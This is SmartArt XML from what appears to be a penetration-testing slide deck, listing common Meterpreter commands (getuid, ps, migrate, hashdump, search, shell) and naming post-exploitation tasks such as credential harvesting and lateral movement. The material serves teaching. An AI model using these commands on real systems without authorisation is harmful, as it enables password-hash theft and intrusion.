    </dgm:pt>
    <dgm:pt modelId="{E4AB5046-558B-45D9-8339-2B48B88E242D}" type="pres">
      <dgm:prSet presAssocID="{02F620E1-BAA7-4DE3-83C0-AA0E5747B20C}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{21B58D07-9D6B-4835-A7E0-768BDEF82D38}" type="pres">
      <dgm:prSet presAssocID="{381DF832-8D96-4523-B0A9-86E5231B5204}" presName="node" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="9">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D3C680CB-9B34-4E03-9A63-4A687FCB0F06}" type="pres">
      <dgm:prSet presAssocID="{99C1A353-FBD3-4FC4-AA8B-61DEF30D9DAA}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{60AD2604-05B9-4E37-8C91-EB278FFB0581}" type="pres">
      <dgm:prSet presAssocID="{E9A33BD5-937A-460A-A6B7-0569FA3BFE2A}" presName="node" presStyleLbl="node1" presStyleIdx="4" presStyleCnt="9">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E546C489-E0AF-405C-82E1-9167A2FEACE8}" type="pres">
      <dgm:prSet presAssocID="{DD837FD5-FB21-4E46-A04C-E7666ECA1A4A}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2ABA6BC6-001A-489B-9869-97C53EADE9EA}" type="pres">
      <dgm:prSet presAssocID="{2ECA8F91-3892-4B56-9B74-CBE5F05191A4}" presName="node" presStyleLbl="node1" presStyleIdx="5" presStyleCnt="9">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{26D7C3CE-4AFB-4F73-A6DC-C33FF7786649}" type="pres">
      <dgm:prSet presAssocID="{33C24520-CC0E-4D38-A18B-A1068AA95493}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{93AE452F-A568-415C-BC88-60FF84BA25B0}" type="pres">
      <dgm:prSet presAssocID="{DFFDEAFF-4D0B-44C0-AF25-53A51FF300A7}" presName="node" presStyleLbl="node1" presStyleIdx="6" presStyleCnt="9">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7B3062C1-A6EB-4B9E-87FE-5A1CFA9B2EB7}" type="pres">
      <dgm:prSet presAssocID="{F33125F4-B3A7-45A4-AF97-F76B8AA4F367}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2E1FB6F7-9CD4-44FC-B1A7-DC3C600DFD20}" type="pres">
      <dgm:prSet presAssocID="{65F63F45-70D5-4A65-8A13-F95973B3A640}" presName="node" presStyleLbl="node1" presStyleIdx="7" presStyleCnt="9">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1C0216F3-6BAA-40D9-90DD-5B765FC8609D}" type="pres">
      <dgm:prSet presAssocID="{805F1243-4C19-409D-8925-D880BFD6B0B1}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C9DFE228-4138-4B53-9921-4E2E9EC0BAF7}" type="pres">
      <dgm:prSet presAssocID="{49D04F8C-9DB1-48C8-BC9F-8DCF136A7B8C}" presName="node" presStyleLbl="node1" presStyleIdx="8" presStyleCnt="9">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{89F43710-5FB9-4034-8E85-00168AFEEF46}" type="presOf" srcId="{2ECA8F91-3892-4B56-9B74-CBE5F05191A4}" destId="{2ABA6BC6-001A-489B-9869-97C53EADE9EA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{1481EF16-5B35-410F-A230-5655D709DE27}" type="presOf" srcId="{E9A33BD5-937A-460A-A6B7-0569FA3BFE2A}" destId="{60AD2604-05B9-4E37-8C91-EB278FFB0581}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{CB0FDF1B-BE2D-4713-9B18-3055D91DA987}" type="presOf" srcId="{DFFDEAFF-4D0B-44C0-AF25-53A51FF300A7}" destId="{93AE452F-A568-415C-BC88-60FF84BA25B0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{E9F3D72E-7B46-485B-9830-5D74B38AF6CE}" srcId="{26686287-C283-4BF0-83F3-1200E04A733D}" destId="{E3FAC53B-E4FB-4DCA-A92B-AB739F0F082E}" srcOrd="0" destOrd="0" parTransId="{9E0F402D-CEF5-4AEC-92E0-E4468E94BB6F}" sibTransId="{E6A4C218-910E-4AA6-846F-F3EF8D036910}"/>
    <dgm:cxn modelId="{D8C07362-FCD1-4049-8199-E6FB2A64029B}" srcId="{26686287-C283-4BF0-83F3-1200E04A733D}" destId="{381DF832-8D96-4523-B0A9-86E5231B5204}" srcOrd="3" destOrd="0" parTransId="{3135121C-765B-4731-89CD-2054EC1D506E}" sibTransId="{99C1A353-FBD3-4FC4-AA8B-61DEF30D9DAA}"/>
    <dgm:cxn modelId="{AC44DB4B-4338-49BB-A25B-964743E6BD8A}" srcId="{26686287-C283-4BF0-83F3-1200E04A733D}" destId="{5558BCEC-06BD-482C-9223-A5A7E8715D0D}" srcOrd="1" destOrd="0" parTransId="{DE39B831-8160-45B6-9F6B-8B8B2D17A2AF}" sibTransId="{4E553751-5429-45D5-9B9A-6A005E0EB3EE}"/>
    <dgm:cxn modelId="{3C4F8253-0966-4D2C-AF86-47FA9B01B969}" srcId="{26686287-C283-4BF0-83F3-1200E04A733D}" destId="{DFFDEAFF-4D0B-44C0-AF25-53A51FF300A7}" srcOrd="6" destOrd="0" parTransId="{F4BE0219-C288-4736-828F-730E70147926}" sibTransId="{F33125F4-B3A7-45A4-AF97-F76B8AA4F367}"/>
    <dgm:cxn modelId="{A43FD873-3085-4281-84FC-43789281B6E7}" srcId="{26686287-C283-4BF0-83F3-1200E04A733D}" destId="{65F63F45-70D5-4A65-8A13-F95973B3A640}" srcOrd="7" destOrd="0" parTransId="{FCB238D3-EC65-47C7-8C5C-2673869FECE9}" sibTransId="{805F1243-4C19-409D-8925-D880BFD6B0B1}"/>
    <dgm:cxn modelId="{17AC1179-0B30-42D7-AE6F-E03E451898ED}" type="presOf" srcId="{5558BCEC-06BD-482C-9223-A5A7E8715D0D}" destId="{562DBC2E-BA9C-413A-96B2-DA091289F5C4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{43C7D459-B544-410E-8585-C4FA8D8609D8}" srcId="{26686287-C283-4BF0-83F3-1200E04A733D}" destId="{49D04F8C-9DB1-48C8-BC9F-8DCF136A7B8C}" srcOrd="8" destOrd="0" parTransId="{2621FC81-6EE5-433C-BF27-D5577F046C6A}" sibTransId="{E9739069-9C5A-447F-854B-2D28BB687823}"/>
    <dgm:cxn modelId="{7EC0968F-BB58-47FA-9798-0039BB0F2F52}" srcId="{26686287-C283-4BF0-83F3-1200E04A733D}" destId="{E9A33BD5-937A-460A-A6B7-0569FA3BFE2A}" srcOrd="4" destOrd="0" parTransId="{6FCA302E-1CB6-4972-904D-640EDBBFEA02}" sibTransId="{DD837FD5-FB21-4E46-A04C-E7666ECA1A4A}"/>
    <dgm:cxn modelId="{F2638790-9123-4A6F-91EF-34E23E4B9C22}" type="presOf" srcId="{49D04F8C-9DB1-48C8-BC9F-8DCF136A7B8C}" destId="{C9DFE228-4138-4B53-9921-4E2E9EC0BAF7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{E2248694-6855-4C36-AE5A-E1CA28B15A72}" type="presOf" srcId="{65F63F45-70D5-4A65-8A13-F95973B3A640}" destId="{2E1FB6F7-9CD4-44FC-B1A7-DC3C600DFD20}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{A2575BA9-28F6-45DA-8277-37C902AF6010}" type="presOf" srcId="{381DF832-8D96-4523-B0A9-86E5231B5204}" destId="{21B58D07-9D6B-4835-A7E0-768BDEF82D38}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{F24C6BAA-E230-48BE-BE06-ACDECED70821}" srcId="{26686287-C283-4BF0-83F3-1200E04A733D}" destId="{2ECA8F91-3892-4B56-9B74-CBE5F05191A4}" srcOrd="5" destOrd="0" parTransId="{3938C548-010B-4C29-8F81-08723059A253}" sibTransId="{33C24520-CC0E-4D38-A18B-A1068AA95493}"/>
    <dgm:cxn modelId="{9BABD8D6-FA72-4178-86A2-F4C8202C370B}" type="presOf" srcId="{E3FAC53B-E4FB-4DCA-A92B-AB739F0F082E}" destId="{FB3445E7-0C1B-42EE-9E74-F0D08A64DF81}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{23703EE0-C3F8-494A-835A-ED3BC5E049A5}" type="presOf" srcId="{329FD0B2-58A8-47F1-B14C-2FA2ACE28716}" destId="{8A66F3D3-0304-4741-A8A6-36A2C97DB8D9}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{C92FE4E2-69E7-44FE-9742-836CC3DD1908}" srcId="{26686287-C283-4BF0-83F3-1200E04A733D}" destId="{329FD0B2-58A8-47F1-B14C-2FA2ACE28716}" srcOrd="2" destOrd="0" parTransId="{714E40BE-4691-45A6-ADD0-5A730478B412}" sibTransId="{02F620E1-BAA7-4DE3-83C0-AA0E5747B20C}"/>
    <dgm:cxn modelId="{A29749F8-E6D3-4A59-8B81-7AE0ED661014}" type="presOf" srcId="{26686287-C283-4BF0-83F3-1200E04A733D}" destId="{3FC0F9E4-E367-4B6D-92AB-7092E8DB11E0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{24936117-5551-408D-B3DA-B33C3BEC160F}" type="presParOf" srcId="{3FC0F9E4-E367-4B6D-92AB-7092E8DB11E0}" destId="{FB3445E7-0C1B-42EE-9E74-F0D08A64DF81}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{A4ABDFD7-259E-4593-B6E9-0C6B6134CA03}" type="presParOf" srcId="{3FC0F9E4-E367-4B6D-92AB-7092E8DB11E0}" destId="{78EBF2F6-3000-4543-824F-EE491F3E9B02}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{41BD0380-1F56-4A51-B622-72AE383A40F7}" type="presParOf" srcId="{3FC0F9E4-E367-4B6D-92AB-7092E8DB11E0}" destId="{562DBC2E-BA9C-413A-96B2-DA091289F5C4}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{819A8E32-7C55-4C36-8C03-9A418F6A683F}" type="presParOf" srcId="{3FC0F9E4-E367-4B6D-92AB-7092E8DB11E0}" destId="{8FAC889B-DC2B-476F-BF6B-8AFE6AC2CD39}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{B678BB2B-C929-443C-BD98-A1F51FB87413}" type="presParOf" srcId="{3FC0F9E4-E367-4B6D-92AB-7092E8DB11E0}" destId="{8A66F3D3-0304-4741-A8A6-36A2C97DB8D9}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{187F745D-BD0D-4A68-BFBB-4F7629975F48}" type="presParOf" srcId="{3FC0F9E4-E367-4B6D-92AB-7092E8DB11E0}" destId="{E4AB5046-558B-45D9-8339-2B48B88E242D}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{812CC0B0-F1FE-4FC5-BDB0-52EC6BF99A66}" type="presParOf" srcId="{3FC0F9E4-E367-4B6D-92AB-7092E8DB11E0}" destId="{21B58D07-9D6B-4835-A7E0-768BDEF82D38}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{2CBA1133-C47C-4C87-9274-A9F4B9411E69}" type="presParOf" srcId="{3FC0F9E4-E367-4B6D-92AB-7092E8DB11E0}" destId="{D3C680CB-9B34-4E03-9A63-4A687FCB0F06}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{40DA933C-6C7D-48FD-AA38-79979F0986C8}" type="presParOf" srcId="{3FC0F9E4-E367-4B6D-92AB-7092E8DB11E0}" destId="{60AD2604-05B9-4E37-8C91-EB278FFB0581}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{168CFFDE-76B4-4D70-8757-C16EBE1CA5FA}" type="presParOf" srcId="{3FC0F9E4-E367-4B6D-92AB-7092E8DB11E0}" destId="{E546C489-E0AF-405C-82E1-9167A2FEACE8}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{2547DC0D-61AB-4608-B465-3CA4792F14CE}" type="presParOf" srcId="{3FC0F9E4-E367-4B6D-92AB-7092E8DB11E0}" destId="{2ABA6BC6-001A-489B-9869-97C53EADE9EA}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{70B2F0C4-7265-425B-9DB3-B5E088B17FEF}" type="presParOf" srcId="{3FC0F9E4-E367-4B6D-92AB-7092E8DB11E0}" destId="{26D7C3CE-4AFB-4F73-A6DC-C33FF7786649}" srcOrd="11" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{DC76ABF0-ACAC-4835-B05A-D33880F3F917}" type="presParOf" srcId="{3FC0F9E4-E367-4B6D-92AB-7092E8DB11E0}" destId="{93AE452F-A568-415C-BC88-60FF84BA25B0}" srcOrd="12" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{153D5CE5-1DE2-4010-9D2C-BC1317096191}" type="presParOf" srcId="{3FC0F9E4-E367-4B6D-92AB-7092E8DB11E0}" destId="{7B3062C1-A6EB-4B9E-87FE-5A1CFA9B2EB7}" srcOrd="13" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{4839BA31-98F8-4421-BF92-BE62890DBCBA}" type="presParOf" srcId="{3FC0F9E4-E367-4B6D-92AB-7092E8DB11E0}" destId="{2E1FB6F7-9CD4-44FC-B1A7-DC3C600DFD20}" srcOrd="14" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{2F978D27-0D0D-4808-B079-2C1395081306}" type="presParOf" srcId="{3FC0F9E4-E367-4B6D-92AB-7092E8DB11E0}" destId="{1C0216F3-6BAA-40D9-90DD-5B765FC8609D}" srcOrd="15" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{8F05B360-3F44-4292-A8D4-61091034D16D}" type="presParOf" srcId="{3FC0F9E4-E367-4B6D-92AB-7092E8DB11E0}" destId="{C9DFE228-4138-4B53-9921-4E2E9EC0BAF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5E5C91-3922-418F-B8F7-464EB36B89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802C71-E230-405F-B4C0-E81AB3CF5DD8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" i="0" baseline="0"/>
            <a:t>Common Meterpreter Commands:</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C70C1B72-3E93-4834-B3B0-8C5903EECE07}" type="parTrans" cxnId="{9062C91D-9AAF-42CC-AEE2-BB04F84406C1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F3AD596C-65CE-40E6-B95C-B05871B740AA}" type="sibTrans" cxnId="{9062C91D-9AAF-42CC-AEE2-BB04F84406C1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DDD5BBB3-0AA2-4B2B-A48B-997B04FFA29A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0" baseline="0"/>
            <a:t>getuid: Shows current user.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{78999592-A927-4B29-AA41-EEB0CBD89704}" type="parTrans" cxnId="{C7EC7163-2DA7-4612-A0FF-FC6A027DB66E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6005CB17-1283-4C25-B39A-25A09B46E397}" type="sibTrans" cxnId="{C7EC7163-2DA7-4612-A0FF-FC6A027DB66E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5C7152C7-70CE-4590-9581-CAD7C040C625}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0" baseline="0"/>
            <a:t>ps: Lists running processes.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7C06557E-9994-4557-A400-DE87286DE6DD}" type="parTrans" cxnId="{87417BB4-463A-4A53-8520-2A36DD68A20E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8EBA70B1-F6AF-4E08-94F6-CDD6D45A9669}" type="sibTrans" cxnId="{87417BB4-463A-4A53-8520-2A36DD68A20E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6C7ACB69-5BBA-40BE-87DB-7F95B827DCFA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0" baseline="0" dirty="0"/>
            <a:t>migrate [PID]: Moves Meterpreter to another process.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{344A0C3E-BA1B-461E-B7F2-1F6079AFFA65}" type="parTrans" cxnId="{9ED7EC5F-2DAD-4FAB-80C4-525D7BB44014}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{14930EB4-ACB2-4E3A-AEE5-EB313022C092}" type="sibTrans" cxnId="{9ED7EC5F-2DAD-4FAB-80C4-525D7BB44014}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2970D06E-C997-4BA8-8DF5-5110013226ED}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0" baseline="0"/>
            <a:t>hashdump: Dumps password hashes from the SAM database.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E83A23C0-42E3-41C1-BDD8-0C9A073E86BD}" type="parTrans" cxnId="{FCB5DF0D-D126-4DC0-B673-7BC8195ED6AA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{66DB45F4-659C-4131-B8FA-FCB3C749616F}" type="sibTrans" cxnId="{FCB5DF0D-D126-4DC0-B673-7BC8195ED6AA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C8C475B4-4F99-4F4F-B724-41AE4C011D5F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0" baseline="0"/>
            <a:t>search: Locates files on the target system.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{26F69B7D-9226-4D56-8BEB-4EBD7EA4F6CC}" type="parTrans" cxnId="{AAA33C16-07FD-4CE5-9303-0B9022C37CA6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AC1F8055-0306-4FCD-A3E2-3AE2905B74DA}" type="sibTrans" cxnId="{AAA33C16-07FD-4CE5-9303-0B9022C37CA6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BD41F568-B9F1-4DC4-B361-F553D5D72888}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0" baseline="0"/>
            <a:t>shell: Opens a command-line shell on the target.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0640B4A8-37FB-4C56-9F63-92E2EBD40589}" type="parTrans" cxnId="{A74B7BAE-F460-4D09-9D77-EEFA4CAC2E1A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D1196959-A24D-43E0-9C76-4A69D45563D5}" type="sibTrans" cxnId="{A74B7BAE-F460-4D09-9D77-EEFA4CAC2E1A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8BD14A9F-4858-43A0-9ADC-7180E9F3E517}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" i="0" baseline="0"/>
            <a:t>Post-Exploitation with Meterpreter:</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AD5B0145-89CC-4971-9FED-BF344596FD67}" type="parTrans" cxnId="{90AF2E76-A9BC-40D8-A934-FC517EF4FE40}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A0D9F33D-4D84-4577-8DDD-BE310AF948EE}" type="sibTrans" cxnId="{90AF2E76-A9BC-40D8-A934-FC517EF4FE40}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D23B75A2-C7B1-42F6-9BF7-8F6F6004566F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0" baseline="0"/>
            <a:t>Privilege escalation, lateral movement, credential harvesting, and file searches are key post-exploitation tasks.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{46E11D4C-907C-4A9A-9CA7-7BC903F65967}" type="parTrans" cxnId="{D1C98779-F4BB-44D7-87CF-72005316C176}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3CF4F287-1D54-4E82-80EE-040326C49DCB}" type="sibTrans" cxnId="{D1C98779-F4BB-44D7-87CF-72005316C176}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6A85540B-37B2-45DA-8D06-D451F95A4C4D}" type="pres">
      <dgm:prSet presAssocID="{A75E5C91-3922-418F-B8F7-464EB36B891A}" presName="linear" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{AE591548-E246-458E-97D2-E81065480C3A}" type="pres">
      <dgm:prSet presAssocID="{B3802C71-E230-405F-B4C0-E81AB3CF5DD8}" presName="parentText" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="9">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6EE90F11-71A2-4A5E-8C8D-0248B580212A}" type="pres">
      <dgm:prSet presAssocID="{F3AD596C-65CE-40E6-B95C-B05871B740AA}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2A546C41-F30E-4DD2-B93F-749E38C4D30E}" type="pres">
      <dgm:prSet presAssocID="{DDD5BBB3-0AA2-4B2B-A48B-997B04FFA29A}" presName="parentText" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="9">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BF89C33F-5E60-42A1-AB50-F7FB1CBD10CF}" type="pres">
      <dgm:prSet presAssocID="{6005CB17-1283-4C25-B39A-25A09B46E397}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EC6D4EA5-4ADF-427B-AFC7-87C940916112}" type="pres">
